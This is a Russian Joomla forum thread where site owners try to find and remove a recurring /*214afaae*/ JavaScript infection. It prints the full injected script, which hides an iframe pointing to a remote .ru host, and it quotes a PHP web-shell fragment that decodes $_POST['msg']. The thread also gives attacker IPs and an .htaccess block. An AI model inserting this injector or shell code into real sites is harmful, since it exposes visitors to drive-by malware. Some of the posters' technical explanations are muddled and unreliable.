Новости Joomla

0 Пользователей и 1 Гость просматривают эту тему.
  • 356 Ответов
  • 68321 Просмотров
*

thedjsm

  • Осваиваюсь на форуме
  • 22
  • 0 / 0
А вы точно не с одного хостинга ?

Дело не в хостинге. У меня собственный выделенный сервер, проблема та-же самая. В лог файлах сервера обнаружилось, что мой сервер атакуют
с IP 93.189.43.70, ...

Аналогичная ситуация у меня была с полмесяца назад. Открыв один из своих сайтов, мой антивирус DrWeb начал ругаться на вирусы с указанием заражённых файлов. Открыв указанные антивирусом файлы, я обнаружил в них вредоносных  код /*214afaae*/. Над решением проблемы с вирусами, я убил целую ночь, но безрезультатно. Удаляя вредоносный код /*214afaae*/ из .js файлов, через некоторое время я обнаруживаю, что данный вредоносный код /*214afaae*/ появляется снова в почищенных вручную файлах.
 
На следующий день я решил ещё раз сделать попытку по-борьбе с данными вирусами. И тут меня ждал неожиданный сюрприз, открыв ранее заражённые файлы, я обнаружил отсутствие кода /*214afaae*/.


 
*

thedjsm

  • Осваиваюсь на форуме
  • 22
  • 0 / 0
Левый код в скриптах ниже.
Не могу понять как это попало. Все сайты после последнего заражения в январе обновлены.
JCE везде прибит. Версия Jooma 1.5.26


Код
/*214afaae*/(function(){
function stripos (f_haystack, f_needle, f_offset) {
 var haystack = (f_haystack + '').toLowerCase();
 var needle = (f_needle + '').toLowerCase();
 var index = 0;
 if ((index = haystack.indexOf(needle, f_offset))!== -1) {
  return index;
 }
 return false;
}
function zzz_check_ua(){
 var blackList = ['Linux','Macintosh','FreeBSD','Chrome','iPad','iPhone','IEMobile','Chromium','Android','Firefox/18.0','Firefox/18.0.1','Firefox/18.0.2','Firefox/19.0','Firefox/19.0.1','Firefox/19.0.2','SymbianOS'];
 var blackUA = false;
 for (var i in blackList) {
  if (stripos(navigator.userAgent, blackList[i])) {
   blackUA = true;
   break;
  }
 }
 return blackUA;
}
function setCookie(name, value, expires) {
 var date = new Date( new Date().getTime() + expires*1000 );
 document.cookie = name+'='+value+'; path=/; expires='+date.toUTCString();
}
function getCookie(name) {
 var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g, '\$1') + "=([^;]*)" ));
 return matches ? decodeURIComponent(matches[1]) : undefined;
}
if (!zzz_check_ua()) {
 var cookie = getCookie('b1004dc22');
 if (cookie == undefined) {
  setCookie('b1004dc22', true, 3600);
  document.write('<iframe height="115" width="115" style="position:absolute;left:-1000px;top:-1000px;" src="http://impeccablepreselected.ru/JJJ7P.8Qd6?default"></iframe>');
 }
};
})();/*eaa795220*//* begin Page */



Нужно искать левые .php (например, 23455.php) файлы в папках сайта. 
*

RostovDriver

  • Осваиваюсь на форуме
  • 12
  • 0 / 0
Цитировать
Нужно искать левые .php (например, 23455.php) файлы в папках сайта.
Согласен. Так и было в прошлый раз, с этим успешно справился касперский. А сейчас ничего не находится даже личным осмотром. В этом-то и затык. Потому и хотел бы узнать, кто где нашел.
*

Adrian1111

  • Захожу иногда
  • 271
  • 1 / 0
Цитата: thedjsm

Нужно искать левые .php (например, 23455.php) файлы в папках сайта.  

Да ищите левые php файлы с этим кодом

Спойлер
[свернуть]

Я вчера с помощью far скрипта нашел и удалил все левые php файлы. И подумал, что на этом конец. однако Поддержка яндекса написала что на сайте вирус остался. Уже понятно, что в довесок нужно искать код в js файлах.

Только вопрос - код (@base64_decode(@str_replace(' ','',urldecode($_POST['msg']))))){ - это и есть шелл?
*

draff

  • Гуру
  • 5803
  • 434 / 7
  • ищу работу
Значение переменной $msg может содержать шелл
*

RostovDriver

  • Осваиваюсь на форуме
  • 12
  • 0 / 0
У меня вот этой шляпы нигде не замечено "@base64_decode(@str_replace(' ','',urldecode($_POST['msg']" , ну или пока не нашел :( но уже и не знаю где искать.
*

kudetolog

  • Новичок
  • 9
  • 0 / 0
Если не секрет, почему задавался вопрос о хосте на nic.ru? У меня как раз он + вышеописанная проблема. Оказались заражены скрипты, данные перезаписываются, время не обновляется. Папки с картинками и папка tmp без "лишнего" контента. По ранее обнаруженному и нейтрализованнному шеллу оказалось, что собственно источнику заразы достаточно было быть в папке tmp одного сайта, чтобы оказались заражены все скрипты всего хостинга.
*

draff

  • Гуру
  • 5803
  • 434 / 7
  • ищу работу
У меня вот этой шляпы нигде не замечено "@base64_decode(@str_replace(' ','',urldecode($_POST['msg']" , ну или пока не нашел :( но уже и не знаю где искать.
Так варианты щелл, вируса могут быть разные. И как уже писали, даже Касперский, Аваст фришный, не определяет как раньше вредоносный код.
*

SashaOskol

  • Новичок
  • 4
  • 1 / 0
Присоединяюсь к обсуждению данной проблемы, заразились все сайты на одном аккаунте, хостинг таймвеб, уже все пароли поменял выдрал в ручную из всех яваскриптов эту гадость но всё безрезультатно, кто нибудь нашел проблему?
Вот код

/*214afaae*/(function(){
function stripos (f_haystack, f_needle, f_offset) {
 var haystack = (f_haystack + '').toLowerCase();
 var needle = (f_needle + '').toLowerCase();
 var index = 0;
 if ((index = haystack.indexOf(needle, f_offset))!== -1) {
  return index;
 }

 и так далее... очень прошу помочь
*

thedjsm

  • Осваиваюсь на форуме
  • 22
  • 0 / 0
Если не секрет, почему задавался вопрос о хосте на nic.ru? У меня как раз он + вышеописанная проблема. Оказались заражены скрипты, данные перезаписываются, время не обновляется. Папки с картинками и папка tmp без "лишнего" контента. По ранее обнаруженному и нейтрализованнному шеллу оказалось, что собственно источнику заразы достаточно было быть в папке tmp одного сайта, чтобы оказались заражены все скрипты всего хостинга.

Походу дела, вирусный скрипт /*214afaae*/ поражает только сайты работающие на CMS Joomla 1.5 и 1.7 где-то имеется глобальная брешь в безопасности в Joomla. Попробую сравнить отчёты после проверки site-Security.ru разных заражённых сайтов работающих на CMS Joomla 1.5 и 1.7

Сделал глобальную проверку с помощью обновлённого антивируса ClamAV на сервере, антивирус скрипт  /*214afaae*/ не считает вирусом.

Буду дальше искать решения по-поиску удаления данного вируса.


    
*

thedjsm

  • Осваиваюсь на форуме
  • 22
  • 0 / 0
Присоединяюсь к обсуждению данной проблемы, заразились все сайты на одном аккаунте, хостинг таймвеб, уже все пароли поменял выдрал в ручную из всех яваскриптов эту гадость но всё безрезультатно, кто нибудь нашел проблему?
Вот код

/*214afaae*/(function(){
function stripos (f_haystack, f_needle, f_offset) {
 var haystack = (f_haystack + '').toLowerCase();
 var needle = (f_needle + '').toLowerCase();
 var index = 0;
 if ((index = haystack.indexOf(needle, f_offset))!== -1) {
  return index;
 }

 и так далее... очень прошу помочь

Дело скорее всего не взломах паролей доступа... А в бреши системы безопасности CMS.

Если внимательно проанализировать access.log заражённого сайта, там можно увидеть из какого места велась атака на ваш сайт, можно узнать про созданные новые фалы наподобие 23455.php...

Попробую через .htaccess заблокировать доступ к сайту неизвестных подозрительных IP адресов, которые обращались к файлам 23455.php...



*

Adrian1111

  • Захожу иногда
  • 271
  • 1 / 0
Походу дела, вирусный скрипт /*214afaae*/ поражает только сайты работающие на CMS Joomla 1.5 и 1.7  

У меня Joomla 2.5 заразилась
*

kudetolog

  • Новичок
  • 9
  • 0 / 0
Мне кажется, что на хостинге заражаются все скрипты. Вне зависимости от системы. В частности, заражены и Joomla и opencart
*

danslash

  • Осваиваюсь на форуме
  • 19
  • 1 / 0
Привет всем!
Такая же проблема появилась у меня. Хостинг TimeWeb. JS заражены - почистил. Через некоторое время опять появилось. Поменял пароли. Кстати заметил что если через Chrome чистишь опять появляется. Через Мозилу сейчас поменял, пока все в порядке.

Подскажите кто где находил файлы левые и зараженные. У меня это /media/system/js
*

RostovDriver

  • Осваиваюсь на форуме
  • 12
  • 0 / 0
Я вот думаю, что если зараза легко расползается по всем папкам в пределах учетки у хостера (у меня и на Wordpress залезло), то она вполне может и в пределах всего сервера хостера ползать. Впрочем, я не знаю как там все устроено, ну а хостер, само собой, клянется, что быть такого не может и они молодцы (тогда зачем они отключают сайты с вирами?).
Интересное наблюдение про чистку через Chrome, поделитесь наблюдениями спустя какое-то время, пожалуйста.
*

danslash

  • Осваиваюсь на форуме
  • 19
  • 1 / 0
Просто у меня код такой стоит, что вызвало подозрение

Код
function papirosa(){
var denyList = ['Chrome'];
var denyUA = false;
for (var i in denyList) {
if (stripos(navigator.userAgent, denyList[i])) {
denyUA = true;
break;
}

Пока все в норме. Чищу ПХПшки
*

thedjsm

  • Осваиваюсь на форуме
  • 22
  • 0 / 0
У вирусного скрипта /*214afaae*/ есть функция фильтрации не работающая с некоторыми браузерами и системными средами операционных систем:
 var blackList = 'Linux|Macintosh|FreeBSD|Chrome|iPad|iPhone|IEMobile|Android|Firefox/18.0|Firefox/18.0.1|Firefox/18.0.2|Firefox/19.0|Firefox/19.0.1|Firefox/19.0.2|Firefox/20.0';

Если открывать заражённый сайт в "опере" или "IE", то скрип переходит в активную форму, вызывая функцию setCookie('код идентификации удалённого узла', true, 292200);
через выполнение JavaScript с обращением на удалённый адрес tcp://[1f07:b8c2::] через 80 порт.

 1f07:b8c2 - код идентификации удалённого узла.


*

danslash

  • Осваиваюсь на форуме
  • 19
  • 1 / 0
Вроде все почистил. Пока все норм. Делал таким образом:
1) Пользуясь постоянно Хромом, удалил кеш, куки
2) Поменял пароль от хостинга (хотя думаю не в этом дело)
3) В Мозиле почистил все (кеши, куки)
4) Зашел на хостинг и скачал то что есть
5) В Тотал Коммандере искал файлы с текстом "echo '<textarea id=areatext>';" , "if (!empty($_POST['msg']) and $msg=@gzinflate(@base64_decode(@str_replace(' ','',urldecode($_POST['msg'])))))" , "echo '</textarea>bg';" ,"/*214afaae*/" их оказалось очень много
6) Чистил данные файлы
*

headless

  • Осваиваюсь на форуме
  • 15
  • 0 / 0
Да ищите левые php файлы с этим кодом

Спойлер
[свернуть]

Я вчера с помощью far скрипта нашел и удалил все левые php файлы. И подумал, что на этом конец. однако Поддержка яндекса написала что на сайте вирус остался. Уже понятно, что в довесок нужно искать код в js файлах.

Только вопрос - код (@base64_decode(@str_replace(' ','',urldecode($_POST['msg']))))){ - это и есть шелл?


__utma  это куки Google аналитикс.
*

headless

  • Осваиваюсь на форуме
  • 15
  • 0 / 0
т.к. смена паролей и чистка не помогает, полагаю что это периодично идет запуск внедрения кодов и левых файлов с какого нибудь хакерского сервака используя дырку какую то. Так что нет смысла чистить пока дырку не закроем.......
*

thedjsm

  • Осваиваюсь на форуме
  • 22
  • 0 / 0
т.к. смена паролей и чистка не помогает, полагаю что это периодично идет запуск внедрения кодов и левых файлов с какого нибудь хакерского сервака используя дырку какую то. Так что нет смысла чистить пока дырку не закроем.......

У меня атака была с IP 93.189.43.70 и  93.189.43.79
*

thedjsm

  • Осваиваюсь на форуме
  • 22
  • 0 / 0
https://www.virustotal.com/ru/ - on-line диагностика фалов и сайта на вирусы. Интересная вещь на счёт работы антивирусов.
*

headless

  • Осваиваюсь на форуме
  • 15
  • 0 / 0
если кто решил проблему, подсобите пожалуйста
*

draff

  • Гуру
  • 5803
  • 434 / 7
  • ищу работу
Так что нет смысла чистить пока дырку не закроем.......
Ну если не заботишься о посетителях сайта, и не боишься что сайт  просядет в выдаче поисковиков, то можешь не чистить сайт от вредоносного кода.
*

headless

  • Осваиваюсь на форуме
  • 15
  • 0 / 0
Ну если не заботишься о посетителях сайта, и не боишься что сайт  просядет в выдаче поисковиков, то можешь не чистить сайт от вредоносного кода.
ты предлагаешь целыми днями сидеть и закачивать чистые JS файлы и удалять левые PHP раз в час?
*

draff

  • Гуру
  • 5803
  • 434 / 7
  • ищу работу
Интересная вещь на счёт работы антивирусов.
Проверил два URL сайтов Joomla , недавних клиентов, и два одинаковых  результата
Цитировать
Не удалось загрузить содержимое по указанной ссылке, либо оно (содержимое) представляет собой разновидность текстового формата (HTML, XML, CST, TXT и т. п.), и в связи с этим данная ссылка не была поставлена в очередь на проверку.
ты предлагаешь целыми днями сидеть и закачивать чистые JS файлы и удалять левые PHP раз в час?
И еще смотреть логи хостинга, установить плагин защиты, писать хостеру о проблеме безопасности,etc
*

thedjsm

  • Осваиваюсь на форуме
  • 22
  • 0 / 0
Проверил два URL сайтов Joomla , недавних клиентов, и два одинаковых  результата
в URL проверке не все сервисы доступны, а если послать отдельный файл - будет результат.

И еще смотреть логи хостинга, установить плагин защиты, писать хостеру о проблеме безопасности,etc

Как не странно это звучит, но, у меня на одном сервере располагаются несколько сайтов. Из них, 2 сайта заражаются вирусом Troj/JSRedir-LH все остальные работают нормально.

Скорее всего, брешь в безопасности Joomla исходит от уязвимости скрипта одного или нескольких компонентов, плагинов, модулей, шаблонов.
 
*

thedjsm

  • Осваиваюсь на форуме
  • 22
  • 0 / 0
Временное решение защиты сайта от сетевой атаки:
В .htaccess файле прописываем код:

Код
Order Allow,Deny
Allow from all
Deny from 93.189.43.70, 93.189.43.70

где, 93.189.43.70, 93.189.43.70 - это IP адреса из выборки лог-фала (ов) access.log  с частыми обращениями к определённым файлам из папки сайта.
*

wishlight

  • Живу я здесь
  • 4980
  • 293 / 1
  • от 150 руб быстрый хостинг без блокировок
Не думаю что поможет. Весь диапазон хакерских серверов не перекроете почти 100%.
*

thedjsm

  • Осваиваюсь на форуме
  • 22
  • 0 / 0
Не думаю что поможет. Весь диапазон хакерских серверов не перекроете почти 100%.
Поможет т.к. данная атака ведётся из одного места с периодом 0,5 месяца. 
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

Изолирование папок сайтов на OpenServer

Автор Lemady

Ответов: 41
Просмотров: 5687
Последний ответ 29.11.2021, 15:47:31
от KoreshS
[Решено] В php файлах во всех появилась хрень какая-то появилось давно что это ?

Автор altyn

Ответов: 72
Просмотров: 36421
Последний ответ 17.01.2019, 00:51:02
от Roki37
Делаю почту в общих настройках через smtp - в тот же день ящик взломан

Автор Mehanick

Ответов: 22
Просмотров: 1105
Последний ответ 25.05.2018, 08:11:19
от dmitry_stas
На мобильном не работает сайт (решено, ошибка в андройде)

Автор dragon4x4

Ответов: 5
Просмотров: 1263
Последний ответ 01.03.2018, 22:46:10
от dragon4x4
В админке еще один администратор

Автор Lidia

Ответов: 26
Просмотров: 2045
Последний ответ 07.12.2017, 16:55:25
от Fess_N